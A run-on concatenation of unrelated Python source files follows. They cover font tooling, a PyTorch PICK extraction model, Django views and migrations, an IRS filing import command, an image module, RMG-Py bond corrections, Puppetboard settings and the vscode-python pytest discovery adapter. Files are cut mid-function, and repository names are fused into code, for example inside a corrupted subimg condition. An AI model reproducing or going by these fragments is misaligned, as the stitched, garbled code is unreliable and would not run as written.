cleanUpGLIFFiles(defaultContentsFilePath, glyphDirPath, doWarning) cleanupContentsList(glyphDirPath, doWarning) def makeUFOFMNDB(srcFontPath): fontInfoPath = os.path.join(srcFontPath, kFontInfoName) # default fiMap, _ = parsePList(fontInfoPath) psName = "NoFamilyName-Regular" familyName = "NoFamilyName" styleName = "Regular" try: psName = fiMap["postscriptFontName"] parts = psName.split("-") familyName = parts[0] if len(parts) > 1: styleName = parts[1] except KeyError: print("ufotools [Warning] UFO font is missing 'postscriptFontName'") try: familyName = fiMap["openTypeNamePreferredFamilyName"] except KeyError: try: familyName = fiMap["familyName"] except KeyError: print("ufotools [Warning] UFO font is missing 'familyName'") try: styleName = fiMap["openTypeNamePreferredSubfamilyName"] except KeyError: try: styleName = fiMap["styleName"] except KeyError: print("ufotools [Warning] UFO font is missing 'styleName'") fmndbPath = fdkutils.get_temp_file_path() parts = [] parts.append("[%s]" % (psName)) parts.append("\tf=%s" % (familyName)) parts.append("\ts=%s" % (styleName)) parts.append("") data = '\n'.join(parts) with open(fmndbPath, "w") as fp: fp.write(data) return fmndbPath def thresholdAttrGlyph(aGlyph, threshold=0.5): """ Like fontPens.thresholdPen.thresholdGlyph, but preserves some glyph- and point-level attributes that are not preserved by that method. """ # preserve glyph-level attributes attrnames = ['anchors'] attrs = {k: getattr(aGlyph, k, None) for k in attrnames if hasattr(aGlyph, k)} # noqa: E501 # filter with ThresholdPen into recording pen recorder = RecordingPen() filterpen = ThresholdPen(recorder, threshold) aGlyph.draw(filterpen) aGlyph.clear() recorder.replay(aGlyph.getPen()) # restore glyph-level attributes for k, v in attrs.items(): setattr(aGlyph, k, v) return aGlyph my_file = open('text.txt','r') def removeLines(file): file_lines = file.readlines() new_file = [] new_line = '' i = 0 print(file_lines) for line in file_lines: if line.count('\n') > 0: new_line = line.replace('\n',' ') new_file.append(new_line) return new_file # print(lines) def readCharNumber(file): i = 0 file.seek(0) for f in file.read(): if f == 'h' or f == 'H': i += 1 return i def readLines(lines): for line in lines: print(line) print(readCharNumber(my_file)) readLines(my_file) print(removeLines(my_file))# -*- coding: utf-8 -*- # @Author: # @Created Time: 7/8/2020 10:54 PM from pickle import NONE from typing import * import torch import torch.nn as nn import numpy as np from .encoder import Encoder from .graph import GLCN from .decoder import Decoder from utils.class_utils import keys_vocab_cls, iob_labels_vocab_cls class PICKModel(nn.Module): def __init__(self, **kwargs): super().__init__() embedding_kwargs = kwargs['embedding_kwargs'] encoder_kwargs = kwargs['encoder_kwargs'] graph_kwargs = kwargs['graph_kwargs'] decoder_kwargs = kwargs['decoder_kwargs'] self.make_model(embedding_kwargs, encoder_kwargs, graph_kwargs, decoder_kwargs) def make_model(self, embedding_kwargs, encoder_kwargs, graph_kwargs, decoder_kwargs): # Given the params of each component, creates components. 
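# --- Tidied, self-contained version (not the original script) of the text.txt
# helpers above: each function re-opens the file instead of sharing one exhausted
# handle, which is why the original printed less than expected.
def remove_newlines(path):
    with open(path, 'r') as f:
        return [line.replace('\n', ' ') for line in f]

def count_h(path):
    with open(path, 'r') as f:
        return sum(1 for ch in f.read() if ch in ('h', 'H'))

def print_lines(path):
    with open(path, 'r') as f:
        for line in f:
            print(line, end='')

if __name__ == '__main__':
    print(count_h('text.txt'))
    print_lines('text.txt')
    print(remove_newlines('text.txt'))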
# embedding_kwargs-> word_emb embedding_kwargs['num_embeddings'] = len(keys_vocab_cls) self.word_emb = nn.Embedding(**embedding_kwargs) encoder_kwargs['char_embedding_dim'] = embedding_kwargs['embedding_dim'] self.encoder = Encoder(**encoder_kwargs) graph_kwargs['in_dim'] = encoder_kwargs['out_dim'] graph_kwargs['out_dim'] = encoder_kwargs['out_dim'] self.graph = GLCN(**graph_kwargs) decoder_kwargs['bilstm_kwargs']['input_size'] = encoder_kwargs['out_dim'] if decoder_kwargs['bilstm_kwargs']['bidirectional']: decoder_kwargs['mlp_kwargs']['in_dim'] = decoder_kwargs['bilstm_kwargs']['hidden_size'] * 2 else: decoder_kwargs['mlp_kwargs']['in_dim'] = decoder_kwargs['bilstm_kwargs']['hidden_size'] decoder_kwargs['mlp_kwargs']['out_dim'] = len(iob_labels_vocab_cls) decoder_kwargs['crf_kwargs']['num_tags'] = len(iob_labels_vocab_cls) self.decoder = Decoder(**decoder_kwargs) def _aggregate_avg_pooling(self, input, text_mask): ''' Apply mean pooling over time (text length), (B*N, T, D) -> (B*N, D) :param input: (B*N, T, D) :param text_mask: (B*N, T) :return: (B*N, D) ''' # filter out padding value, (B*N, T, D) input = input * text_mask.detach().unsqueeze(2).float() # (B*N, D) sum_out = torch.sum(input, dim=1) # (B*N, ) text_len = text_mask.float().sum(dim=1) # (B*N, D) text_len = text_len.unsqueeze(1).expand_as(sum_out) text_len = text_len + text_len.eq(0).float() # avoid divide zero denominator # (B*N, D) mean_out = sum_out.div(text_len) return mean_out @staticmethod def compute_mask(mask: torch.Tensor): ''' :param mask: (B, N, T) :return: True for masked key position according to pytorch official implementation of Transformer ''' B, N, T = mask.shape mask = mask.reshape(B * N, T) mask_sum = mask.sum(dim=-1) # (B*N,) # (B*N,) graph_node_mask = mask_sum != 0 # (B * N, T) graph_node_mask = graph_node_mask.unsqueeze(-1).expand(B * N, T) # True for valid node # If src key are all be masked (indicting text segments is null), atten_weight will be nan after softmax # in self-attention layer of Transformer. # So we do not mask all padded sample. Instead we mask it after Transformer encoding. 
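# Illustrative sketch (assumes only torch) of why a fully padded text segment
# cannot be masked inside the Transformer itself: if every key position of a
# row is masked, softmax over that row is NaN, so empty nodes are left
# unmasked here and filtered out afterwards with graph_node_mask.
import torch
scores = torch.zeros(1, 3)                      # one query over 3 key positions
pad = torch.tensor([[True, True, True]])        # a completely empty segment
print(torch.softmax(scores.masked_fill(pad, float("-inf")), dim=-1))
# -> tensor([[nan, nan, nan]])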
src_key_padding_mask = torch.logical_not(mask.bool()) & graph_node_mask # True for padding mask position return src_key_padding_mask, graph_node_mask def forward(self, **kwargs): # input # whole_image = kwargs['whole_image'] # (B, 3, H, W) whole_image = None relation_features = kwargs['relation_features'] # initial relation embedding (B, N, N, 6) text_segments = kwargs['text_segments'] # text segments (B, N, T) text_length = kwargs['text_length'] # (B, N) iob_tags_label = kwargs['iob_tags_label'] if self.training else None # (B, N, T) mask = kwargs['mask'] # (B, N, T) # boxes_coordinate = kwargs['boxes_coordinate'] # (B, num_boxes, 8) boxes_coordinate = None # (B, num_boxes, 8) ##### Forward Begin ##### ### Encoder module ### # word embeddin text_emb = self.word_emb(text_segments) # src_key_padding_mask is text padding mask, True is padding value (B*N, T) # graph_node_mask is mask for graph, True is valid node, (B*N, T) src_key_padding_mask, graph_node_mask = self.compute_mask(mask) # set of nodes, (B*N, T, D) x = self.encoder(images=whole_image, boxes_coordinate=boxes_coordinate, transcripts=text_emb, src_key_padding_mask=src_key_padding_mask) ### Graph module ### # text_mask, True for valid, (including all not valid node), (B*N, T) text_mask = torch.logical_not(src_key_padding_mask).byte() # (B*N, T, D) -> (B*N, D) x_gcn = self._aggregate_avg_pooling(x, text_mask) # (B*N, 1),True is valid node graph_node_mask = graph_node_mask.any(dim=-1, keepdim=True) # (B*N, D), filter out not valid node x_gcn = x_gcn * graph_node_mask.byte() # initial adjacent matrix (B, N, N) B, N, T = mask.shape init_adj = torch.ones((B, N, N), device=text_emb.device) boxes_num = mask[:, :, 0].sum(dim=1, keepdim=True) # (B, 1) # (B, N, D) x_gcn = x_gcn.reshape(B, N, -1) # (B, N, D), (B, N, N), (B,) x_gcn, soft_adj, gl_loss = self.graph(x_gcn, relation_features, init_adj, boxes_num) adj = soft_adj * init_adj ### Decoder module ### logits, new_mask, log_likelihood = self.decoder(x.reshape(B, N, T, -1), x_gcn, mask, text_length, iob_tags_label) ##### Forward End ##### output = {"logits": logits, "new_mask": new_mask, "adj": adj} if self.training: output['gl_loss'] = gl_loss crf_loss = -log_likelihood output['crf_loss'] = crf_loss return output def __str__(self): ''' Model prints with number of trainable parameters ''' model_parameters = filter(lambda p: p.requires_grad, self.parameters()) params = sum([np.prod(p.size()) for p in model_parameters]) return super().__str__() + '\nTrainable parameters: {}'.format(params) def model_parameters(self): model_parameters = filter(lambda p: p.requires_grad, self.parameters()) params = sum([np.prod(p.size()) for p in model_parameters]) return params saygindogu/PersonalPortfolioWebsiteportfolio/jobs/views.py from django.shortcuts import render from .models import Job # Create your views here. 
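# Hedged sketch of the view defined just below, rewritten with an explicit
# queryset; 'Job', 'render' and the template path come from this file, while
# the function and variable names here are illustrative.
def home_explicit(request):
    jobs = Job.objects.all()      # evaluate the manager into a queryset
    return render(request, 'jobs/home.html', {'jobs': jobs})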
def home( request ):
    steve = Job.objects
    return render(request, 'jobs/home.html', { 'jobs': steve})
#
# ANTLR Translator Generator
# Project led by at http://www.jGuru.com
# Software rights: http://www.antlr.org/license.html
#
# $Id$
#
from antlr import *
devna-dev/durar-backend
# Generated by Django 3.0.8 on 2020-07-09 03:09
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('books', '0029_auto_20200704_1942'),
    ]

    operations = [
        migrations.AddField(
            model_name='bookmedia',
            name='duration',
            field=models.PositiveIntegerField(null=True, verbose_name='Audio duration'),
        ),
    ]
import unicodecsv as csv
import json

from django.core.management.base import BaseCommand
from django.conf import settings
from django.db import reset_queries, connection

from irsx.xmlrunner import XMLRunner
from irsx.filing import Filing
from irsx.standardizer import Standardizer

from filing.models import xml_submission as XMLSubmission, ProcessedFiling

unicodeType = type(unicode())


class Command(BaseCommand):
    help = 'Dump some fields that are of interest'

    def handle(self, *args, **options):
        self.xml_runner = None
        self.standardizer = Standardizer()
        count = 0
        submissions = XMLSubmission.objects.filter(
            schema_year__gte=2013,
            sub_date__contains='2017'
        ).values('taxpayer_name', 'tax_period', 'sub_date', 'object_id')
        for submission in submissions:
            count += 1
            if count % 100 == 0:
                print("Processed %s filings" % count)
                reset_queries()  # not sure this will matter, but...
                self.xml_runner = None  # Erase this to prevent memory leaks
            if not self.xml_runner:
                # will start up faster if we don't have to reread/import csvs
                self.xml_runner = XMLRunner(standardizer=self.standardizer)
            whole_submission = XMLSubmission.objects.get(
                object_id=submission['object_id']
            )
            if type(whole_submission.as_json) == unicodeType:
                submission_json = json.loads(whole_submission.as_json)
            else:
                # Assume it's a dict?
# We don't have any "working" installations that return json as json submission_json=whole_submission.as_json filingobj = Filing(submission['object_id'], json=submission_json) parsedFiling = self.xml_runner.run_from_filing_obj( filingobj, verbose=False, ) result = parsedFiling.get_result() keyerrors = parsedFiling.get_keyerrors() has_keyerrors = len(keyerrors) > 0 try: ProcessedFiling.objects.get(object_id=submission['object_id']) except ProcessedFiling.DoesNotExist: ProcessedFiling.objects.create( ein = whole_submission.ein, object_id = whole_submission.object_id, processed_json = result, keyerrors = keyerrors, has_keyerrors = has_keyerrors, submission = whole_submission ) img.py # -*- encoding: utf-8 -*- def null(): """ retorna una imatge nula >>> null() ('NULL', None) """ return ('NULL', None) def is_null(i): """ retorna true si i es una imatge nula >>> is_null(('NULL', None)) True """ if i!=null(): return False else: return True def white_rgb(w,h): """ Retorna una imatge en format RGB >>> white_rgb(2,2) ('RGB', [[(255, 255, 255), (255, 255, 255)], [(255, 255, 255), (255, 255, 255)]]) >>> white_rgb(1,1) ('RGB', [[(255, 255, 255)]]) """ i=0 l=[] while i<(h): j=0 l_2=[] while j<(w): l_2+=[(255,255,255)] j+=1 l+=[l_2] i+=1 return ('RGB',l) def white_grey(w,h): """ retorna una imatge en blanc en escala de grisos >>> white_grey(2,2) ('L', [[255, 255], [255, 255]]) >>> white_grey(1,1) ('L', [[255]]) """ i=0 l=[] while i<(h): j=0 l_2=[] while j<(w): l_2+=[(255)] j+=1 l+=[l_2] i+=1 return ('L',l) def white_bw(w,h): """ retorna una imatge en blanc en el format blanc i negre >>> white_bw(3,3) ('1', [[255, 255, 255], [255, 255, 255], [255, 255, 255]]) >>> white_bw(1,1) ('1', [[255]]) """ i=0 l=[] while i<(h): j=0 l_2=[] while j<(w): l_2+=[(255)] j+=1 l+=[l_2] i+=1 return ('1',l) def format1(i): """ Donada una imatge en retorna el format >>> format1(('RGB',[(234,9,8),(234,235,123),(255,123,2)])) 'RGB' >>> format1(('L', [[234, 123, 123]])) 'L' """ return i[0] def matrix(i): """ Donada una imatge img retorna la matriu de pixels corresponent >>> matrix(('1',[255,0,255])) [255, 0, 255] """ return i[1] def img(matrix,model='DISCOVER'): """ Donada una matriu de pixels, detecta si es tracta de una imatge de rgb, escala de grisos o blanc i negre i creara una imatge nova. 
>>> img([(255,0,0),(255,255,255),(255,0,255)], model='DISCOVER') ('1', [(255, 0, 0), (255, 255, 255), (255, 0, 255)]) >>> img([(233, 0 ,0)], model='DISCOVER') ('L', [(233, 0, 0)]) """ t=() tipo="" if model=='DISCOVER': for element in matrix: for pixel in element: if type(pixel)==type(t): return('RGB',matrix) elif pixel>=1 and pixel<=254: return ('L',matrix) else: tipo='1' return (tipo,matrix) else: return (model, matrix) def get_w(i): """ Retorna la amplada de la imatge >>> get_w(('1',[[255,0],[0,255]])) 2 >>> get_w(('RGB',[[(255,234,234)]])) 1 """ a=matrix(i) return len(a[0]) def get_h(i): """ Retorna la alçada de la imatge >>> get_h(('1',[[255,0],[255,0],[255,0]])) 3 >>> get_h(('L',[[255,0],[255,0]])) 2 """ return len(matrix(i)) def subimg(i,ow,oh,w,h): """ retorna una sub-imatge img que té l'origen a les coordenades (ow,oh) i té mides w i h >>> subimg(('1',[[255,255,0],[0,0,255],[0,0,255]]),0,0,1,1) ('1', [[255]]) >>> subimg(('RGB', [[(234, 123, 123)]]), 0,0,1,1) ('RGB', [[(234, 123, 123)]]) """ matriu=matrix(i) subimg=[] f=0 for fila in matriu: c=0 f_n=[] for columna in fila: if f>=oh and f=ow and c=oh and fkblondal/RMG-Py #!/usr/bin/env python3 ############################################################################### # # # RMG - Reaction Mechanism Generator # # # # Copyright (c) 2002-2019 Prof. (), # # Prof. () and the RMG Team () # # # # Permission is hereby granted, free of charge, to any person obtaining a # # copy of this software and associated documentation files (the 'Software'), # # to deal in the Software without restriction, including without limitation # # the rights to use, copy, modify, merge, publish, distribute, sublicense, # # and/or sell copies of the Software, and to permit persons to whom the # # Software is furnished to do so, subject to the following conditions: # # # # The above copyright notice and this permission notice shall be included in # # all copies or substantial portions of the Software. # # # # THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # # DEALINGS IN THE SOFTWARE. # # # ############################################################################### """ This module provides methods for applying Melius-type bond additivity corrections (M-BAC) as described in: Anantharaman and Melius, J. Phys. Chem. A 2005, 109, 1734-1747 """ import numpy as np import pybel from rmgpy.molecule import Molecule, Atom, Bond, get_element import arkane.encorr.data as data from arkane.exceptions import BondAdditivityCorrectionError ################################################################################ atom_spins = { 'H': 0.5, 'C': 1.0, 'N': 1.5, 'O': 1.0, 'F': 0.5, 'Si': 1.0, 'P': 1.5, 'S': 1.0, 'Cl': 0.5, 'Br': 0.5, 'I': 0.5 } def get_bac(model_chemistry, coords, nums, multiplicity=1, mol_corr=0.0): """ Given the model chemistry, molecular coordinates, atomic numbers, and dictionaries of BAC parameters, return the total BAC (should be SUBTRACTED from energy). Note that a molecular correction term other than 0 destroys the size consistency of the quantum chemistry method. This correction also requires the multiplicity of the molecule. 
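# Hedged numeric sketch of the Melius-type bond-length correction applied
# below: for a bond i-j the term is sqrt(A_i * A_j) * exp(-alpha * r_ij) with
# alpha = 3.0 per Angstrom; the A parameters and the bond length used here are
# invented for illustration only.
import math
alpha = 3.0               # Angstrom^-1, same constant as in the code below
A_C, A_H = 0.20, 0.05     # made-up bond_corr_length values
r_CH = 1.09               # Angstrom, a typical C-H bond length
print(math.sqrt(A_C * A_H) * math.exp(-alpha * r_CH))  # one bond's contribution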
""" alpha = 3.0 # Angstrom^-1 # Get BAC parameters try: params = data.mbac[model_chemistry] except KeyError: raise BondAdditivityCorrectionError( 'Missing Melius-type BAC parameters for model chemistry {}'.format(model_chemistry) ) atom_corr = params['atom_corr'] bond_corr_length = params['bond_corr_length'] bond_corr_neighbor = params['bond_corr_neighbor'] # Get single-bonded RMG molecule mol = geo_to_mol(coords, nums) # Molecular correction spin = 0.5 * (multiplicity - 1) bac_mol = mol_corr * (spin - sum(atom_spins[atom.element.symbol] for atom in mol.atoms)) # Atomic correction bac_atom = sum(atom_corr[atom.element.symbol] for atom in mol.atoms) # Bond correction bac_bond = 0.0 for bond in mol.get_all_edges(): atom1 = bond.atom1 atom2 = bond.atom2 symbol1 = atom1.element.symbol symbol2 = atom2.element.symbol # Bond length correction length_corr = (bond_corr_length[symbol1] * bond_corr_length[symbol2]) ** 0.5 length = np.linalg.norm(atom1.coords - atom2.coords) bac_bond += length_corr * np.exp(-alpha * length) # Neighbor correction for other_atom, other_bond in mol.get_bonds(atom1).items(): # Atoms adjacent to atom1 if other_bond is not bond: other_symbol = other_atom.element.symbol bac_bond += bond_corr_neighbor[symbol1] + bond_corr_neighbor[other_symbol] for other_atom, other_bond in mol.get_bonds(atom2).items(): # Atoms adjacent to atom2 if other_bond is not bond: other_symbol = other_atom.element.symbol bac_bond += bond_corr_neighbor[symbol2] + bond_corr_neighbor[other_symbol] return (bac_mol + bac_atom + bac_bond) * 4184.0 # Convert kcal/mol to J/mol def geo_to_mol(coords, nums): """ Convert molecular geometry specified by atomic coordinates and atomic numbers to RMG molecule. Use Open Babel for most cases because it's better at recognizing long bonds. Use RMG for hydrogen because Open Babel can't do it for mysterious reasons. """ if list(nums) == [1, 1]: mol = Molecule() mol.from_xyz(nums, coords) else: xyz = '{}\n\n'.format(len(nums)) xyz += '\n'.join('{0} {1[0]: .10f} {1[1]: .10f} {1[2]: .10f}'.format(n, c) for n, c in zip(nums, coords)) mol = pybel.readstring('xyz', xyz) mol = pybel_to_rmg(mol) return mol def pybel_to_rmg(pybel_mol): """ Convert Pybel molecule to RMG molecule but ignore charge, multiplicity, and bond orders. """ mol = Molecule() for pybel_atom in pybel_mol: element = get_element(pybel_atom.atomicnum) atom = Atom(element=element, coords=np.array(pybel_atom.coords)) mol.vertices.append(atom) for obbond in pybel.ob.OBMolBondIter(pybel_mol.OBMol): begin_idx = obbond.GetBeginAtomIdx() - 1 # Open Babel indexes atoms starting at 1 end_idx = obbond.GetEndAtomIdx() - 1 bond = Bond(mol.vertices[begin_idx], mol.vertices[end_idx]) mol.add_bond(bond) return mol 10-100 #------------------------------------------------------------------------------ # Copyright (c) 2012, Enthought, Inc. # All rights reserved. #------------------------------------------------------------------------------ from traits.api import ( HasTraits, Bool, Range, Enum, on_trait_change, Property, Str, List, Int, cached_property, Instance ) from enaml.styling.color import Color # An enum defining a image extension. ImageFileExt = Enum( 'bmp', 'png', 'jpg', 'jpeg', 'gif', 'pbm', 'pgm', 'ppm', 'tiff', 'xbm', 'xpm', ) class ViewConfig(HasTraits): """ A simple state object to share amongst the various ui widgets. This is not strictly required when developing an Enaml application, but as the view complexity grows, it makes the code more unified and manageable. 
It's also easier to see the view logic in centralized place. """ #: The types of images for which to search. search_image_exts = List(ImageFileExt, value=['png', 'jpg', 'jpeg']) #: The regex pattern to use when searching for images. image_file_pattern = Property(Str, depends_on='search_image_exts') #: The directory currently being searched. search_dir = Str('.') #: The minimum allowed thumbnail size. min_thumb_size = Int(16) #: The maximum allowed thumbnail size. max_thumb_size = Int(256) #: The size of the thumbnails in the ui. thumb_size = Range('min_thumb_size', 'max_thumb_size', value=150) #: Select which browsing widget should be visible visible_browser_widget = Enum('textual', 'thumbnails') #: The layout mode to use for the thumbnails view. thumb_layout = Enum('vertical', 'horizontal', 'grid') #: The location of the dock pane dock_area = Enum('left', 'right', 'top', 'bottom', value='left') #: Whether or not the dock pane is floating floating_dock = Bool(False) #: Whether or not to recrusively load the thumbnails recursive_load = Bool(True) #: The background color of the image viewing widget. viewer_bgcolor = Instance(Color, (146, 146, 146)) #: The background color of the browser widgets. browser_bgcolor = Instance(Color, (235, 239, 246)) @cached_property def _get_image_file_pattern(self): """ Creates a search regex for the requested image types. """ return r'.*?\.(%s)$' % '|'.join(self.search_image_exts) @on_trait_change('dock_area, floating_dock') def _update_thumb_layout(self): """ Updates the thumbnail layout mode based on the position of the dock pane. """ if self.floating_dock: self.thumb_layout = 'grid' elif self.dock_area in ('left', 'right'): self.thumb_layout = 'vertical' else: self.thumb_layout = 'horizontal' PUPPETDB_HOST = 'localhost' PUPPETDB_PORT = 8080 PUPPETDB_SSL_VERIFY = True PUPPETDB_KEY = None PUPPETDB_CERT = None PUPPETDB_TIMEOUT = 20 DEV_LISTEN_HOST = '127.0.0.1' DEV_LISTEN_PORT = 5000 UNRESPONSIVE_HOURS = 2 ENABLE_QUERY = True LOCALISE_TIMESTAMP = True LOGLEVEL = 'info' REPORTS_COUNT = 10 OFFLINE_MODE = False from .setup.LinkedList import LinkedList as LinkedList # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """ During "collection", pytest finds all the tests it supports. These are called "items". The process is top-down, mostly tracing down through the file system. Aside from its own machinery, pytest supports hooks that find tests. Effectively, pytest starts with a set of "collectors"; objects that can provide a list of tests and sub-collectors. All collectors in the resulting tree are visited and the tests aggregated. For the most part, each test's (and collector's) parent is identified as the collector that collected it. Collectors and items are collectively identified as "nodes". The pytest API relies on collector and item objects providing specific methods and attributes. In addition to corresponding base classes, pytest provides a number of concrete impementations. The following are the known pytest node types: Node Collector FSCollector Session (the top-level collector) File Module Package DoctestTextfile DoctestModule PyCollector (Module) (...) Class UnitTestCase Instance Item Function TestCaseFunction DoctestItem Here are the unique attrs for those classes: Node name nodeid (readonly) config session (parent) - the parent node (fspath) - the file from which the node was collected ---- own_marksers - explicit markers (e.g. 
with @pytest.mark()) keywords extra_keyword_matches Item location - where the actual test source code is: (relfspath, lno, fullname) user_properties PyCollector module class instance obj Function module class instance obj function (callspec) (fixturenames) funcargs originalname - w/o decorations, e.g. [...] for parameterized DoctestItem dtest obj When parsing an item, we make use of the following attributes: * name * nodeid * __class__ + __name__ * fspath * location * function + __name__ + __code__ + __closure__ * own_markers """ from __future__ import absolute_import, print_function import sys import pytest import _pytest.doctest import _pytest.unittest from ..info import TestInfo, TestPath def should_never_reach_here(node, *extra): """Indicates a code path we should never reach.""" print('The Python extension has run into an unexpected situation') print('while processing a pytest node during test discovery. Please') print('Please open an issue at:') print(' https://github.com/microsoft/vscode-python/issues') print('and paste the following output there.') print() for field, info in _summarize_item(node): print('{}: {}'.format(field, info)) if extra: print() print('extra info:') for info in extra: if isinstance(line, str): print(str) else: try: print(*line) except TypeError: print(line) print() print('traceback:') import traceback traceback.print_stack() msg = 'Unexpected pytest node (see printed output).' exc = NotImplementedError(msg) exc.node = node return exc def parse_item(item, _normcase, _pathsep): """Return (TestInfo, [suite ID]) for the given item. The suite IDs, if any, are in parent order with the item's direct parent at the beginning. The parent of the last suite ID (or of the test if there are no suites) is the file ID, which corresponds to TestInfo.path. """ #_debug_item(item, showsummary=True) kind, _ = _get_item_kind(item) (nodeid, parents, fileid, testfunc, parameterized ) = _parse_node_id(item.nodeid, kind, _pathsep, _normcase) # Note: testfunc does not necessarily match item.function.__name__. # This can result from importing a test function from another module. # Figure out the file. relfile = fileid fspath = _normcase(str(item.fspath)) if not fspath.endswith(relfile[1:]): raise should_never_reach_here( item, fspath, relfile, ) testroot = fspath[:-len(relfile) + 1] location, fullname = _get_location(item, relfile, _normcase, _pathsep) if kind == 'function': if testfunc and fullname != testfunc + parameterized: raise should_never_reach_here( item, fullname, testfunc, parameterized, ) elif kind == 'doctest': if (testfunc and fullname != testfunc and fullname != '[doctest] ' + testfunc): raise should_never_reach_here( item, fullname, testfunc, ) testfunc = None # Sort out the parent. if parents: parentid, _, _ = parents[0] else: parentid = None # Sort out markers. # See: https://docs.pytest.org/en/latest/reference.html#marks markers = set() for marker in item.own_markers: if marker.name == 'parameterize': # We've already covered these. continue elif marker.name == 'skip': markers.add('skip') elif marker.name == 'skipif': markers.add('skip-if') elif marker.name == 'xfail': markers.add('expected-failure') # We can add support for other markers as we need them? 
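# Hedged sketch of the marker translation performed just above, written as a
# plain lookup table; only the names handled by that loop are included, and
# 'parameterize' is skipped because parameterization is already part of the
# node ID.
_MARKER_LABELS = {
    'skip': 'skip',
    'skipif': 'skip-if',
    'xfail': 'expected-failure',
}

def translate_markers(own_markers):
    """Return sorted discovery labels for a pytest item's own markers."""
    return sorted({_MARKER_LABELS[m.name]
                   for m in own_markers
                   if m.name in _MARKER_LABELS})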
test = TestInfo( id=nodeid, name=item.name, path=TestPath( root=testroot, relfile=relfile, func=testfunc, sub=[parameterized] if parameterized else None, ), source=location, markers=sorted(markers) if markers else None, parentid=parentid, ) if parents and parents[-1] == ('.', None, 'folder'): # This should always be true? parents[-1] = ('.', testroot, 'folder') return test, parents def _get_location(item, relfile, _normcase, _pathsep): """Return (loc str, fullname) for the given item.""" srcfile, lineno, fullname = item.location srcfile = _normcase(srcfile) if srcfile in (relfile, relfile[len(_pathsep) + 1:]): srcfile = relfile else: # pytest supports discovery of tests imported from other # modules. This is reflected by a different filename # in item.location. srcfile, lineno = _find_location( srcfile, lineno, relfile, item.function, _pathsep) if not srcfile.startswith('.' + _pathsep): srcfile = '.' + _pathsep + srcfile # from pytest, line numbers are 0-based location = '{}:{}'.format(srcfile, int(lineno) + 1) return location, fullname def _find_location(srcfile, lineno, relfile, func, _pathsep): """Return (filename, lno) for the given location info.""" if sys.version_info > (3,): return srcfile, lineno if (_pathsep + 'unittest' + _pathsep + 'case.py') not in srcfile: return srcfile, lineno # Unwrap the decorator (e.g. unittest.skip). srcfile = relfile lineno = -1 try: func = func.__closure__[0].cell_contents except (IndexError, AttributeError): return srcfile, lineno else: if callable(func) and func.__code__.co_filename.endswith(relfile[1:]): lineno = func.__code__.co_firstlineno - 1 return srcfile, lineno def _parse_node_id(testid, kind, _pathsep, _normcase): """Return the components of the given node ID, in heirarchical order.""" nodes = iter(_iter_nodes(testid, kind, _pathsep, _normcase)) testid, name, kind = next(nodes) parents = [] parameterized = None if kind == 'doctest': parents = list(nodes) fileid, _, _ = parents[0] return testid, parents, fileid, name, parameterized elif kind is None: fullname = None else: if kind == 'subtest': node = next(nodes) parents.append(node) funcid, funcname, _ = node parameterized = testid[len(funcid):] elif kind == 'function': funcname = name else: raise should_never_reach_here( testid, kind, ) fullname = funcname for node in nodes: parents.append(node) parentid, name, kind = node if kind == 'file': fileid = parentid break elif fullname is None: # We don't guess how to interpret the node ID for these tests. continue elif kind == 'suite': fullname = name + '.' + fullname else: raise should_never_reach_here( testid, node, ) else: fileid = None parents.extend(nodes) # Add the rest in as-is. return testid, parents, fileid, fullname, parameterized or '' def _iter_nodes(nodeid, kind, _pathsep, _normcase): """Yield (nodeid, name, kind) for the given node ID and its parents.""" nodeid = _normalize_node_id(nodeid, kind, _pathsep, _normcase) if kind == 'function' and nodeid.endswith(']'): funcid, sep, parameterized = nodeid.partition('[') if not sep: raise should_never_reach_here( nodeid, ) yield (nodeid, sep + parameterized, 'subtest') nodeid = funcid parentid, _, name = nodeid.rpartition('::') if not parentid: if kind is None: # This assumes that plugins can generate nodes that do not # have a parent. All the builtin nodes have one. yield (nodeid, name, kind) return # We expect at least a filename and a name. raise should_never_reach_here( nodeid, ) yield (nodeid, name, kind) # Extract the suites. 
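# Hedged worked example (file and test names invented) of the parent chain
# that _iter_nodes yields for a parameterized method, using the same
# partition/rpartition splitting as the code around this point:
#
#   './tests/test_spam.py::TestEggs::test_bacon[x0]'
#       -> ('./tests/test_spam.py::TestEggs::test_bacon[x0]', '[x0]', 'subtest')
#       -> ('./tests/test_spam.py::TestEggs::test_bacon', 'test_bacon', 'function')
#       -> ('./tests/test_spam.py::TestEggs', 'TestEggs', 'suite')
#       -> ('./tests/test_spam.py', 'test_spam.py', 'file')
#       -> ('./tests', 'tests', 'folder')
#       -> ('.', None, 'folder')    # the test root, filled in by parse_item()
nodeid = './tests/test_spam.py::TestEggs::test_bacon[x0]'
funcid, _, parameterized = nodeid.partition('[')
parentid, _, name = funcid.rpartition('::')
print(parameterized, name, parentid)
# x0] test_bacon ./tests/test_spam.py::TestEggs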
while '::' in parentid: suiteid = parentid parentid, _, name = parentid.rpartition('::') yield (suiteid, name, 'suite') # Extract the file and folders. fileid = parentid parentid, _, filename = fileid.rpartition(_pathsep) yield (fileid, filename, 'file') # We're guaranteed at least one (the test root). while _pathsep in parentid: folderid = parentid parentid, _, foldername = folderid.rpartition(_pathsep) yield (folderid, foldername, 'folder') # We set the actual test root later at the bottom of parse_item(). testroot = None yield (parentid, testroot, 'folder') def _normalize_node_id(nodeid, kind, _pathsep, _normcase): """Return the canonical form for the given node ID.""" while '::()::' in nodeid: nodeid = nodeid.replace('::()::', '::') if kind is None: return nodeid fileid, sep, remainder = nodeid.partition('::') if sep: # pytest works fine even if we normalize the filename. nodeid = _normcase(fileid) + sep + remainder if nodeid.startswith(_pathsep): raise should_never_reach_here( nodeid, ) if not nodeid.startswith('.' + _pathsep): nodeid = '.' + _pathsep + nodeid return nodeid def _get_item_kind(item): """Return (kind, isunittest) for the given item.""" if isinstance(item, _pytest.doctest.DoctestItem): return 'doctest', False elif isinstance(item, _pytest.unittest.TestCaseFunction): return 'function', True elif isinstance(item, 